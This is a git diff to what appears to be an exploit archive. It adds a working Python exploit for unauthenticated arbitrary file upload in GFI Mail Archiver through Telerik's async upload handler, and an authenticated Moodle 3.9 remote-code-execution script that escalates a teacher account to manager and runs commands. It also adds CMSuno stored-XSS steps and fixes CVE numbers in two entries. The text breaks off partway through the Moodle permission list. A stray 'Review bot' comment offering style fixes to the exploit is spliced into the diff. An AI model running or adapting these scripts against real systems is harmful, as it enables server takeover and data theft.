diff --git a/exploits/multiple/webapps/50181.py b/exploits/multiple/webapps/50181.py new file mode 100755 index 000000000..a14342a6b --- /dev/null +++ b/exploits/multiple/webapps/50181.py 
@@ -0,0 +1,350 @@ +# Exploit Title: GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated) +# Date: 21/03/2021 +# Exploit Author: Amin Bohio +# Original Research & Code By: Paul Taylor / Foregenix Ltd +# Original Exploit: https://github.com/bao7uo/RAU_crypto +# Vendor Homepage: https://www.gfi.com +# Software Link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-archiver +# Vulnerable Versions: GFI Mail Archiver <= 15.1 +# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload +# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference +# Tested on: Windows & Linux + +# Usage: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p pathonwebserver + +#!/usr/bin/python3 + +# Original Telerik Exploit Author: Paul Taylor / @bao7uo +# https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py + +# Modified by: Amin Bohio + +import sys +import base64 +import json +import re +import requests +import os +from Crypto.Cipher import AES +from Crypto.Hash import HMAC +from Crypto.Hash import SHA256 +from Crypto.Hash import SHA1 +from struct import Struct +from operator import xor +from itertools import starmap + +import binascii + +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# ****************************************** +# ****************************************** + +# ADVANCED_SETTINGS section 1 of 2 +# Warning, the below prevents certificate warnings, +# and verify = False (CERT_VERIFY prevents them being verified + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +CERT_VERIFY = False + +# ****************************************** +# ****************************************** + +class PBKDF: + + def sha1(v): + hl = SHA1.new() + hl.update(v) + return hl.digest() + + def derive1(password, salt): + hash = (password + salt).encode() + 
for i in range(0, 99): + hash = PBKDF.sha1(hash) + + result = PBKDF.sha1(hash) + i = 1 + while len(result) < 48: + result += PBKDF.sha1(str(i).encode() + hash) + i += 1 + + return result + + def hmacsha1(v): + hl = PBKDF.mac.copy() + hl.update(v) + return bytearray(hl.digest()) + + + def derive2(password, salt): + # Credit: @mitsuhiko https://github.com/mitsuhiko/python-pbkdf2/blob/master/pbkdf2.py + result_length = 48 + PBKDF.mac = HMAC.new(bytes(password.encode()), None, SHA1.new()) + result = [] + for b in range(1, -(-result_length // PBKDF.mac.digest_size) + 1): + rv = u = PBKDF.hmacsha1(salt.encode() + Struct('>i').pack(b)) + for i in range(999): + u = PBKDF.hmacsha1(u) + rv = starmap(xor, zip(rv, u)) + result.extend(rv) + result = b''.join(map(bytes, [result]))[:result_length] + return result + + def derive(type, password,salt = ''.join(chr(i) for i in [58, 84, 91, 25, 10, 34, 29, 68, 60, 88, 44, 51, 1])): + if type == 1: + result = PBKDF.derive1(password, salt) + result = result[0:32] + result[8:16] + result[40:48] # Bizarre hack + elif type == 2: + result = PBKDF.derive2(password, salt) + + return result[0:32], result[32:] + + +class RAUCipher: + + +# ****************************************** +# ****************************************** + + # ADVANCED_SETTINGS section 2 of 2 + + # Default settings are for vulnerable versions before 2017 patches with default keys + + T_Upload_ConfigurationHashKey = \ + "PrivateKeyForHashOfUploadConfiguration" # Default hardcoded key for versions before 2017 patches + HASHKEY = T_Upload_ConfigurationHashKey # or your custom hashkey + + T_AsyncUpload_ConfigurationEncryptionKey = \ + "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration" # Default hardcoded key for versions before 2017 patches + PASSWORD = T_AsyncUpload_ConfigurationEncryptionKey # or your custom password + + # Latest tested version working with this setting: 2018.1.117 + # Probably working up to and including 2018.3.910 + PBKDF_ALGORITHM = 1 + + # Earliest 
tested version working with this setting: 2019.2.514 + # Probably introduced 2019.1.115 +# PBKDF_ALGORITHM = 2 + +# ****************************************** +# ****************************************** + + key, iv = PBKDF.derive(PBKDF_ALGORITHM, PASSWORD) + +# print(binascii.hexlify(key).decode().upper()) +# print(binascii.hexlify(iv).decode().upper()) + + def encrypt(plaintext): + sys.stderr.write("Encrypting... ") + encoded = "" + for i in plaintext: + encoded = encoded + i + "\x00" + plaintext = encoded + ( + chr(16 - (len(encoded) % 16)) * + (16 - (len(encoded) % 16)) + ) + cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv) + sys.stderr.write("done\n") + return base64.b64encode(cipher.encrypt(plaintext.encode())).decode() + + + def decrypt(ciphertext): + sys.stderr.write("Decrypting... ") + ciphertext = base64.b64decode(ciphertext) + cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv) + unpad = lambda s: s[0:-ord(chr(s[-1]))] + sys.stderr.write("done\n") + return unpad(cipher.decrypt(ciphertext)).decode()[0::2] + + + def addHmac(string, Version): + + isHmacVersion = False + + # "Encrypt-then-MAC" feature introduced in R1 2017 + # Required for >= "2017.1.118" (e.g. "2017.1.118", "2017.1.228", "2017.2.503" etc.) 
+ + if int(Version[:4]) >= 2017: + isHmacVersion = True + + hmac = HMAC.new( + bytes(RAUCipher.HASHKEY.encode()), + string.encode(), + SHA256.new() + ) + + hmac = base64.b64encode(hmac.digest()).decode() + return string + hmac if isHmacVersion else string + + +def getProxy(proxy): + return { "http" : proxy, "https" : proxy } + + +def rauPostData_enc(partA, partB): + data = "-----------------------------62616f37756f2f\r\n" + data += "Content-Disposition: form-data; name=\"rauPostData\"\r\n" + data += "\r\n" + data += RAUCipher.encrypt(partA) + "&" + RAUCipher.encrypt(partB) + "\r\n" + return data + + +def rauPostData_prep(TempTargetFolder, Version): + TargetFolder = RAUCipher.addHmac( + RAUCipher.encrypt(""), + Version + ) + TempTargetFolder = RAUCipher.addHmac( + RAUCipher.encrypt(TempTargetFolder), + Version + ) + + partA = \ + '{"TargetFolder":"' + TargetFolder + '","TempTargetFolder":"' + \ + TempTargetFolder + \ + '","MaxFileSize":0,"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},"UseApplicationPoolImpersonation":false}' + + partB = \ + "Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=" + \ + Version + ", Culture=neutral, PublicKeyToken=121fae78165ba3d4" + + return rauPostData_enc(partA, partB) + + +def payload(TempTargetFolder, Version, payload_filename): + sys.stderr.write("Local file path: " + payload_filename + "\n") + payload_filebasename = os.path.basename(payload_filename) + sys.stderr.write("Destination file name: " + payload_filebasename + "\n") + sys.stderr.write("Destination path: " + TempTargetFolder + "\n") + sys.stderr.write("Version: " + Version + "\n") + sys.stderr.write("Preparing payload... 
\n") + payload_file = open(payload_filename, "rb") + payload_file_data = payload_file.read() + payload_file.close() + + data = rauPostData_prep(TempTargetFolder, Version) + data += "-----------------------------62616f37756f2f\r\n" + data += "Content-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n" + data += "Content-Type: application/octet-stream\r\n" + data += "\r\n" + data += payload_file_data.decode("raw_unicode_escape") + "\r\n" + data += "-----------------------------62616f37756f2f\r\n" + data += "Content-Disposition: form-data; name=\"fileName\"\r\n" + data += "\r\n" + data += "RAU_crypto.bypass\r\n" + data += "-----------------------------62616f37756f2f\r\n" + data += "Content-Disposition: form-data; name=\"contentType\"\r\n" + data += "\r\n" + data += "text/html\r\n" + data += "-----------------------------62616f37756f2f\r\n" + data += "Content-Disposition: form-data; name=\"lastModifiedDate\"\r\n" + data += "\r\n" + data += "2019-01-02T03:04:05.067Z\r\n" + data += "-----------------------------62616f37756f2f\r\n" + data += "Content-Disposition: form-data; name=\"metadata\"\r\n" + data += "\r\n" + data += "{\"TotalChunks\":1,\"ChunkIndex\":0,\"TotalFileSize\":1,\"UploadID\":\"" + \ + payload_filebasename + "\"}\r\n" + data += "-----------------------------62616f37756f2f--\r\n" + data += "\r\n" + sys.stderr.write("Payload prep done\n") + return data + + +def upload(data, url, proxy = False): + + global CERT_VERIFY + + sys.stderr.write("Preparing to send request to " + url + "\n") + session = requests.Session() + request = requests.Request( + "POST", + url, + data=data + ) + request = request.prepare() + request.headers["Content-Type"] = \ + "multipart/form-data; " +\ + "boundary=---------------------------62616f37756f2f" + response = session.send(request, verify=CERT_VERIFY, proxies = getProxy(proxy)) + sys.stderr.write("Request done\n") + return response.text + + +def decode_rauPostData(rauPostData): + rauPostData = rauPostData.split("&") + 
rauJSON = RAUCipher.decrypt(rauPostData[0]) + decoded = "\nJSON: " + rauJSON + "\n" + TempTargetFolder = json.loads(rauJSON)["TempTargetFolder"] + decoded = decoded + "\nTempTargetFolder = " + \ + RAUCipher.decrypt(TempTargetFolder) + "\n" + rauVersion = RAUCipher.decrypt(rauPostData[1]) + decoded = decoded + "\nVersion: " + rauVersion + "\n" + return decoded + + +def mode_decrypt(): + # decrypt ciphertext + ciphertext = sys.argv[2] + print("\n" + RAUCipher.decrypt(ciphertext) + "\n") + + +def mode_Decrypt_rauPostData(): + # decrypt rauPostData + rauPostData = sys.argv[2] + print(decode_rauPostData(rauPostData)) + + +def mode_encrypt(): + # encrypt plaintext + plaintext = sys.argv[2] + print("\n" + RAUCipher.encrypt(plaintext) + "\n") + + +def mode_Encrypt_rauPostData(): + # encrypt rauPostData based on TempTargetFolder and Version + TempTargetFolder = sys.argv[2] + Version = sys.argv[3] + print( + "rauPostData: " + + rauPostData_prep(TempTargetFolder, Version) + + "\n" + ) + + +def mode_payload(): + # generate a payload based on TempTargetFolder, Version and payload file + TempTargetFolder = sys.argv[2] + Version = "2013.1.417.40" + payload_filename = sys.argv[4] + print("Content-Type: multipart/form-data; boundary=---------------------------62616f37756f2f") + print(payload(TempTargetFolder, Version, payload_filename)) + + +def mode_Post(proxy = False): + # generate and upload a payload based on + # TempTargetFolder, Version, payload file and url + Version = "2013.1.417.40" + url = sys.argv[2] + "/Telerik.Web.UI.WebResource.axd?type=rau" + payload_filename = sys.argv[4] + TempTargetFolder = sys.argv[6] + + print(upload(payload(TempTargetFolder, Version, payload_filename), url, proxy)) + print("\n[+] Check your uploaded file\n"); + + +def mode_help(): + print( + "Usage: \nExample1: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Program Files\\GFI\\Archiver\\ASPNET\\UI\\Images\\' \nExample2: python3 gfipwn.py -u http://[host]/Archiver/ -f 
filetoupload -p 'C:\\Windows\\Temp'") + + +sys.stderr.write("\n[+] Original Research by Paul Taylor / @bao7uo \n[+] Modified by Amin Bohio\n") +sys.stderr.write("[+] GFI Mail Archiver <= 15.1 - Telerik Arbitrary File Upload\n\n") + +if len(sys.argv) < 2: + mode_help() +elif sys.argv[1] == "-u" and len(sys.argv) == 7: + mode_Post() +else: + mode_help() \ No newline at end of file diff --git a/exploits/php/webapps/49352.txt b/exploits/php/webapps/49352.txt index daa3dd95f..77392a270 100644 --- a/exploits/php/webapps/49352.txt +++ b/exploits/php/webapps/49352.txt @@ -8,7 +8,7 @@ # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application -# CVE: CVE-2021-25791 +# CVE: CVE-2021-25790 Step 1: Create a new user then login Step 2: Click on "Register" page to register a room. diff --git a/exploits/php/webapps/49396.txt b/exploits/php/webapps/49396.txt index d54e9824a..cc6269efb 100644 --- a/exploits/php/webapps/49396.txt +++ b/exploits/php/webapps/49396.txt @@ -1,10 +1,11 @@ -# Exploit Title: Online Doctor Appointment System 1.0 - Multiple Stored XSS +# Exploit Title: Online Doctor Appointment System 1.0 - 'Multiple' Stored XSS # Tested on: Windows 10 # Exploit Author: Mohamed habib Smidi (Craniums) # Date: 2021-01-08 # Vendor Homepage: https://www.sourcecodester.com/php/14663/online-doctor-appointment-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14663&title=Online+Doctor+Appointment+System+in+PHP+with+Full+Source+Code # Affected Version: Version 1 +# CVE : CVE-2021-25791 Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php Step 2: then Click on the username and go to profile diff --git a/exploits/php/webapps/50179.txt b/exploits/php/webapps/50179.txt new file mode 100644 index 000000000..c10ce9ef9 --- /dev/null +++ b/exploits/php/webapps/50179.txt 
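Review bot: The `#!/usr/bin/python3` line sits after the header comment block rather than on line 1, so even though the file is added with mode 100755 the shebang is inert and the script cannot be run directly; move it to the first line of the file. In `payload()`, `payload_file = open(payload_filename, "rb")` with a manual `.close()` leaks the handle if `read()` raises; replace the three lines with `with open(payload_filename, "rb") as payload_file:` / `    payload_file_data = payload_file.read()`. As a point of style, the trailing semicolon in `print("\n[+] Check your uploaded file\n");` in `mode_Post` should be dropped.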
@@ -0,0 +1,23 @@ +# Exploit Title: CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated) +# Date: 03-08-2021 +# Exploit Author: splint3rsec +# Vendor Homepage: https://github.com/boiteasite +# Software Link: https://github.com/boiteasite/cmsuno +# Affected Version(s): CMSuno 1.7 (and prior) +# CVE : CVE-2021-36654 + +CMSuno version 1.7 and prior is vulnerable to a stored cross-site scripting. + +The attacker must be authenticated to exploit the vulnerability. + +The payload injection is done while updating the template's image filename, vulnerable parameter is *tgo* + +Steps to reproduce: + +1. Go to /uno.php and click on *plugins* +2. Click on *Logo* +3. Choose a random picture in your files repo, click on save and intercept the request +4. Edit the POST request to /uno/template/uno1/uno1.php by modifying the tgo parameter's value to ")} +5. Forward the request and click on *publish* +6. Click on *See the website* +7. XSS \ No newline at end of file diff --git a/exploits/php/webapps/50180.py b/exploits/php/webapps/50180.py new file mode 100755 index 000000000..2e61cdc96 --- /dev/null +++ b/exploits/php/webapps/50180.py 
@@ -0,0 +1,349 @@ +# Exploit Title: Moodle 3.9 - Remote Code Execution (RCE) (Authenticated) +# Date: 12-05-2021 +# Exploit Author: lanz +# Vendor Homepage: https://moodle.org/ +# Version: Moodle 3.9 +# Tested on: FreeBSD + +#!/usr/bin/python3 + +## Moodle 3.9 - RCE (Authenticated as teacher) +## Based on PoC and Payload to assign full permissions to manager rol: +## * https://github.com/HoangKien1020/CVE-2020-14321 + +## Repository: https://github.com/lanzt/CVE-2020-14321/blob/main/CVE-2020-14321_RCE.py + +import string, random +import requests, re +import argparse +import base64 +import signal +import time +from pwn import * + +class Color: + BLUE = '\033[94m' + GREEN = '\033[92m' + YELLOW = '\033[93m' + RED = '\033[91m' + END = '\033[0m' + +def def_handler(sig, frame): + print(Color.RED + "\n[!] 3xIt1ngG...\n") + exit(1) + +signal.signal(signal.SIGINT, def_handler) + +banner = base64.b64decode("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").decode() + +print(Color.BLUE + banner + Color.END) + +def usagemybro(): + fNombre = os.path.basename(__file__) + ussage = fNombre + ' [-h] [-u USERNAME] [-p PASSWORD] [-idm ID_MANAGER] [-idc ID_COURSE] [-c COMMAND] [--cookie TEACHER_COOKIE] url\n\n' + ussage += '[+] Examples:\n' + ussage += '\t' + fNombre + ' http://moodle.site.com/moodle -u teacher_name -p teacher_pass\n' + ussage += '\t' + fNombre + " http://moodle.site.com/moodle --cookie thisistheffcookieofmyteaaacher\n" + return ussage + +def arguments(): + parse = argparse.ArgumentParser(usage=usagemybro()) + parse.add_argument(dest='url', type=str, help='URL Moodle site') + parse.add_argument('-u', dest='username', type=str, default='lanz', help='Teacher username, default: lanz') + parse.add_argument('-p', dest='password', type=str, default='Lanz123$!', help='Teacher password, default: Lanz123$!') + parse.add_argument('-idm', dest='id_manager', type=str, default='25', help='Manager user ID, default: 25') + parse.add_argument('-idc', dest='id_course', type=str, 
default='5', help='Course ID valid to enrol yourself, default: 5') + parse.add_argument('-c', dest='command', type=str, default='whoami', help='Command to execute, default: whoami') + parse.add_argument('--cookie', dest='teacher_cookie', type=str, default='', help='Teacher cookie (if you don\'t have valid credentials)') + return parse.parse_args() + +def login(url, username, password, course_id, teacher_cookie): + ''' + Sign in on site, with creds or with cookie + ''' + + p1 = log.progress("Login on site") + + session = requests.Session() + r = session.get(url + '/login/index.php') + + # Sign in with teacher cookie + if teacher_cookie != "": + p1.status("Cookie " + Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END) + time.sleep(2) + + # In case the URL format is: http://moodle.site.com/moodle + cookie_domain = url.split('/')[2] # moodle.site.com + cookie_path = "/%s/" % (url.split('/')[3]) # /moodle/ + session.cookies.set('MoodleSession', teacher_cookie, domain=cookie_domain, path=cookie_path) + + r = session.get(url + '/user/index.php', params={"id":course_id}) + try: + re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0] + except IndexError: + p1.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n") + exit(1) + + id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0] + sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] + + p1.success(Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END + Color.YELLOW + " ✓" + Color.END) + time.sleep(1) + + # Sign in with teacher credentials + elif username and password != "": + p1.status("Creds " + Color.BLUE + username + ":" + password + Color.END) + time.sleep(2) + + login_token = re.findall(r'name="logintoken" value="(.*?)"', r.text)[0] + + data_post = { + "anchor" : "", + "logintoken" : login_token, + "username" : username, + "password" : password + } + + r = 
session.post(url + '/login/index.php', data=data_post) + if "Recently accessed courses" not in r.text: + p1.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nInvalid credentials.\n") + exit(1) + + id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0] + sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] + + p1.success(Color.BLUE + username + ":" + password + Color.END + Color.YELLOW + " ✓" + Color.END) + time.sleep(1) + + else: + print(Color.RED + "\nUse valid credentials or valid cookie\n") + exit(1) + + return session, id_user, sess_key + +def enrol2rce(session, url, id_manager, username, course_id, teacher_cookie, command): + ''' + Assign rol manager to teacher and manager account in the course. + ''' + + p4 = log.progress("Updating roles to move on manager accout") + time.sleep(1) + + r = session.get(url + '/user/index.php', params={"id":course_id}) + try: + teacher_user = re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0] + except IndexError: + p4.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n") + exit(1) + + p4.status("Teacher " + Color.BLUE + teacher_user + Color.END) + time.sleep(1) + + id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0] + sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] + + session = update_rol(session, url, sess_key, course_id, id_user) + session = update_rol(session, url, sess_key, course_id, id_manager) + + data_get = { + "id" : course_id, + "user" : id_manager, + "sesskey" : sess_key + } + + r = session.get(url + '/course/loginas.php', params=data_get) + if "You are logged in as" not in r.text: + p4.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nError trying to move on manager account. 
Validate credentials (or cookie).\n") + exit(1) + + p4.success(Color.YELLOW + "✓" + Color.END) + time.sleep(1) + + sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] + + # Updating rol manager to enable install plugins + session, sess_key = update_rol_manager(session, url, sess_key) + + # Upload malicious zip file + zipb64_up(session, url, sess_key, teacher_user, course_id) + + # RCE on system + moodle_RCE(url, command) + +def update_rol(session, url, sess_key, course_id, id_user): + ''' + Updating teacher rol to enable he update other users + ''' + + data_get = { + "mform_showmore_main" : "0", + "id" : course_id, + "action" : "enrol", + "enrolid" : "10", + "sesskey" : sess_key, + "_qf__enrol_manual_enrol_users_form" : "1", + "mform_showmore_id_main" : "0", + "userlist[]" : id_user, + "roletoassign" : "1", + "startdate" : "4", + "duration" : "" + } + + r = session.get(url + '/enrol/manual/ajax.php', params=data_get) + return session + +def update_rol_manager(session, url, sess_key): + ''' + Updating rol manager to enable install plugins + * Extracted from: https://github.com/HoangKien1020/CVE-2020-14321 + ''' + + p6 = log.progress("Updating rol manager to enable install plugins") + time.sleep(1) + + data_get = { + "action":"edit", + "roleid":"1" + } + + random_desc = ''.join(random.choice(string.ascii_lowercase) for i in range(15)) + + # Headache part :P + data_post = 
[('sesskey',sess_key),('return','manage'),('resettype','none'),('shortname','manager'),('name',''),('description',random_desc),('archetype','manager'),('contextlevel10','0'),('contextlevel10','1'),('contextlevel30','0'),('contextlevel30','1'),('contextlevel40','0'),('contextlevel40','1'),('contextlevel50','0'),('contextlevel50','1'),('contextlevel70','0'),('contextlevel70','1'),('contextlevel80','0'),('contextlevel80','1'),('allowassign[]',''),('allowassign[]','1'),('allowassign[]','2'),('allowassign[]','3'),('allowassign[]','4'),('allowassign[]','5'),('allowassign[]','6'),('allowassign[]','7'),('allowassign[]','8'),('allowoverride[]',''),('allowoverride[]','1'),('allowoverride[]','2'),('allowoverride[]','3'),('allowoverride[]','4'),('allowoverride[]','5'),('allowoverride[]','6'),('allowoverride[]','7'),('allowoverride[]','8'),('allowswitch[]',''),('allowswitch[]','1'),('allowswitch[]','2'),('allowswitch[]','3'),('allowswitch[]','4'),('allowswitch[]','5'),('allowswitch[]','6'),('allowswitch[]','7'),('allowswitch[]','8'),('allowview[]',''),('allowview[]','1'),('allowview[]','2'),('allowview[]','3'),('allowview[]','4'),('allowview[]','5'),('allowview[]','6'),('allowview[]','7'),('allowview[]','8'),('block/admin_bookmarks:myaddinstance','1'),('block/badges:myaddinstance','1'),('block/calendar_month:myaddinstance','1'),('block/calendar_upcoming:myaddinstance','1'),('block/comments:myaddinstance','1'),('block/course_list:myaddinstance','1'),('block/globalsearch:myaddinstance','1'),('block/glossary_random:myaddinstance','1'),('block/html:myaddinstance','1'),('block/lp:addinstance','1'),('block/lp:myaddinstance','1'),('block/mentees:myaddinstance','1'),('block/mnet_hosts:myaddinstance','1'),('block/myoverview:myaddinstance','1'),('block/myprofile:myaddinstance','1'),('block/navigation:myaddinstance','1'),('block/news_items:myaddinstance','1'),('block/online_users:myaddinstance','1'),('block/private_files:myaddinstance','1'),('block/recentlyaccessedcourses:myaddinstance','1
'),('block/recentlyaccesseditems:myaddinstance','1'),('block/rss_client:myaddinstance','1'),('block/settings:myaddinstance','1'),('block/starredcourses:myaddinstance','1'),('block/tags:myaddinstance','1'),('block/timeline:myaddinstance','1'),('enrol/category:synchronised','1'),('message/airnotifier:managedevice','1'),('moodle/analytics:listowninsights','1'),('moodle/analytics:managemodels','1'),('moodle/badges:manageglobalsettings','1'),('moodle/blog:create','1'),('moodle/blog:manageentries','1'),('moodle/blog:manageexternal','1'),('moodle/blog:search','1'),('moodle/blog:view','1'),('moodle/blog:viewdrafts','1'),('moodle/course:configurecustomfields','1'),('moodle/course:recommendactivity','1'),('moodle/grade:managesharedforms','1'),('moodle/grade:sharegradingforms','1'),('moodle/my:configsyspages','1'),('moodle/my:manageblocks','1'),('moodle/portfolio:export','1'),('moodle/question:config','1'),('moodle/restore:createuser','1'),('moodle/role:manage','1'),('moodle/search:query','1'),('moodle/site:config','1'),('moodle/site:configview','1'),('moodle/site:deleteanymessage','1'),('moodle/site:deleteownmessage','1'),('moodle/site:doclinks','1'),('moodle/site:forcelanguage','1'),('moodle/site:maintenanceaccess','1'),('moodle/site:manageallmessaging','1'),('moodle/site:messageanyuser','1'),('moodle/site:mnetlogintoremote','1'),('moodle/site:readallmessages','1'),('moodle/site:sendmessage','1'),('moodle/site:uploadusers','1'),('moodle/site:viewparticipants','1'),('moodle/tag:edit','1'),('moodle/tag:editblocks','1'),('moodle/tag:flag','1'),('moodle/tag:manage','1'),('moodle/user:changeownpassword','1'),('moodle/user:create','1'),('moodle/user:delete','1'),('moodle/user:editownmessageprofile','1'),('moodle/user:editownprofile','1'),('moodle/user:ignoreuserquota','1'),('moodle/user:manageownblocks','1'),('moodle/user:manageownfiles','1'),('moodle/user:managesyspages','1'),('moodle/user:update','1'),('moodle/webservice:createmobiletoken','1'),('moodle/webservice:createtoken','
1'),('moodle/webservice:managealltokens','1'),('quizaccess/seb:managetemplates','1'),('report/courseoverview:view','1'),('report/performance:view','1'),('report/questioninstances:view','1'),('report/security:view','1'),('report/status:view','1'),('tool/customlang:edit','1'),('tool/customlang:view','1'),('tool/dataprivacy:managedataregistry','1'),('tool/dataprivacy:managedatarequests','1'),('tool/dataprivacy:requestdeleteforotheruser','1'),('tool/lpmigrate:frameworksmigrate','1'),('tool/monitor:managetool','1'),('tool/policy:accept','1'),('tool/policy:managedocs','1'),('tool/policy:viewacceptances','1'),('tool/uploaduser:uploaduserpictures','1'),('tool/usertours:managetours','1'),('auth/oauth2:managelinkedlogins','1'),('moodle/badges:manageownbadges','1'),('moodle/badges:viewotherbadges','1'),('moodle/competency:evidencedelete','1'),('moodle/competency:plancomment','1'),('moodle/competency:plancommentown','1'),('moodle/competency:planmanage','1'),('moodle/competency:planmanagedraft','1'),('moodle/competency:planmanageown','1'),('moodle/competency:planmanageowndraft','1'),('moodle/competency:planrequestreview','1'),('moodle/competency:planrequestreviewown','1'),('moodle/competency:planreview','1'),('moodle/competency:planview','1'),('moodle/competency:planviewdraft','1'),('moodle/competency:planviewown','1'),('moodle/competency:planviewowndraft','1'),('moodle/competency:usercompetencycomment','1'),('moodle/competency:usercompetencycommentown','1'),('moodle/competency:usercompetencyrequestreview','1'),('moodle/competency:usercompetencyrequestreviewown','1'),('moodle/competency:usercompetencyreview','1'),('moodle/competency:usercompetencyview','1'),('moodle/competency:userevidencemanage','1'),('moodle/competency:userevidencemanageown','0'),('moodle/competency:userevidenceview','1'),('moodle/user:editmessageprofile','1'),('moodle/user:editprofile','1'),('moodle/user:manageblocks','1'),('moodle/user:readuserblogs','1'),('moodle/user:readuserposts','1'),('moodle/user:viewa
lldetails','1'),('moodle/user:viewlastip','1'),('moodle/user:viewuseractivitiesreport','1'),('report/usersessions:manageownsessions','1'),('tool/dataprivacy:downloadallrequests','1'),('tool/dataprivacy:downloadownrequest','1'),('tool/dataprivacy:makedatadeletionrequestsforchildren','1'),('tool/dataprivacy:makedatarequestsforchildren','1'),('tool/dataprivacy:requestdelete','1'),('tool/policy:acceptbehalf','1'),('moodle/category:manage','1'),('moodle/category:viewcourselist','1'),('moodle/category:viewhiddencategories','1'),('moodle/cohort:assign','1'),('moodle/cohort:manage','1'),('moodle/competency:competencymanage','1'),('moodle/competency:competencyview','1'),('moodle/competency:templatemanage','1'),('moodle/competency:templateview','1'),('moodle/course:create','1'),('moodle/course:request','1'),('moodle/site:approvecourse','1'),('repository/contentbank:accesscoursecategorycontent','1'),('repository/contentbank:accessgeneralcontent','1'),('block/recent_activity:viewaddupdatemodule','1'),('block/recent_activity:viewdeletemodule','1'),('contenttype/h5p:access','1'),('contenttype/h5p:upload','1'),('contenttype/h5p:useeditor','1'),('enrol/category:config','1'),('enrol/cohort:config','1'),('enrol/cohort:unenrol','1'),('enrol/database:config','1'),('enrol/database:unenrol','1'),('enrol/flatfile:manage','1'),('enrol/flatfile:unenrol','1'),('enrol/guest:config','1'),('enrol/imsenterprise:config','1'),('enrol/ldap:manage','1'),('enrol/lti:config','1'),('enrol/lti:unenrol','1'),('enrol/manual:config','1'),('enrol/manual:enrol','1'),('enrol/manual:manage','1'),('enrol/manual:unenrol','1'),('enrol/manual:unenrolself','1'),('enrol/meta:config','1'),('enrol/meta:selectaslinked','1'),('enrol/meta:unenrol','1'),('enrol/mnet:config','1'),('enrol/paypal:config','1'),('enrol/paypal:manage','1'),('enrol/paypal:unenrol','1'),('enrol/paypal:unenrolself','1'),('enrol/self:config','1'),('enrol/self:holdkey','1'),('enrol/self:manage','1'),('enrol/self:unenrol','1'),('enrol/self:unenrolsel
f','1'),('gradeexport/ods:publish','1'),('gradeexport/ods:view','1'),('gradeexport/txt:publish','1'),('gradeexport/txt:view','1'),('gradeexport/xls:publish','1'),('gradeexport/xls:view','1'),('gradeexport/xml:publish','1'),('gradeexport/xml:view','1'),('gradeimport/csv:view','1'),('gradeimport/direct:view','1'),('gradeimport/xml:publish','1'),('gradeimport/xml:view','1'),('gradereport/grader:view','1'),('gradereport/history:view','1'),('gradereport/outcomes:view','1'),('gradereport/overview:view','1'),('gradereport/singleview:view','1'),('gradereport/user:view','1'),('mod/assign:addinstance','1'),('mod/assignment:addinstance','1'),('mod/book:addinstance','1'),('mod/chat:addinstance','1'),('mod/choice:addinstance','1'),('mod/data:addinstance','1'),('mod/feedback:addinstance','1'),('mod/folder:addinstance','1'),('mod/forum:addinstance','1'),('mod/glossary:addinstance','1'),('mod/h5pactivity:addinstance','1'),('mod/imscp:addinstance','1'),('mod/label:addinstance','1'),('mod/lesson:addinstance','1'),('mod/lti:addcoursetool','1'),('mod/lti:addinstance','1'),('mod/lti:addmanualinstance','1'),('mod/lti:addpreconfiguredinstance','1'),('mod/lti:requesttooladd','1'),('mod/page:addinstance','1'),('mod/quiz:addinstance','1'),('mod/resource:addinstance','1'),('mod/scorm:addinstance','1'),('mod/survey:addinstance','1'),('mod/url:addinstance','1'),('mod/wiki:addinstance','1'),('mod/workshop:addinstance','1'),('moodle/analytics:listinsights','1'),('moodle/backup:anonymise','1'),('moodle/backup:backupcourse','1'),('moodle/backup:backupsection','1'),('moodle/backup:backuptargetimport','1'),('moodle/backup:configure','1'),('moodle/backup:downloadfile','1'),('moodle/backup:userinfo','1'),('moodle/badges:awardbadge','1'),('moodle/badges:configurecriteria','1'),('moodle/badges:configuredetails','1'),('moodle/badges:configuremessages','1'),('moodle/badges:createbadge','1'),('moodle/badges:deletebadge','1'),('moodle/badges:earnbadge','1'),('moodle/badges:revokebadge','1'),('moodle/badges:v
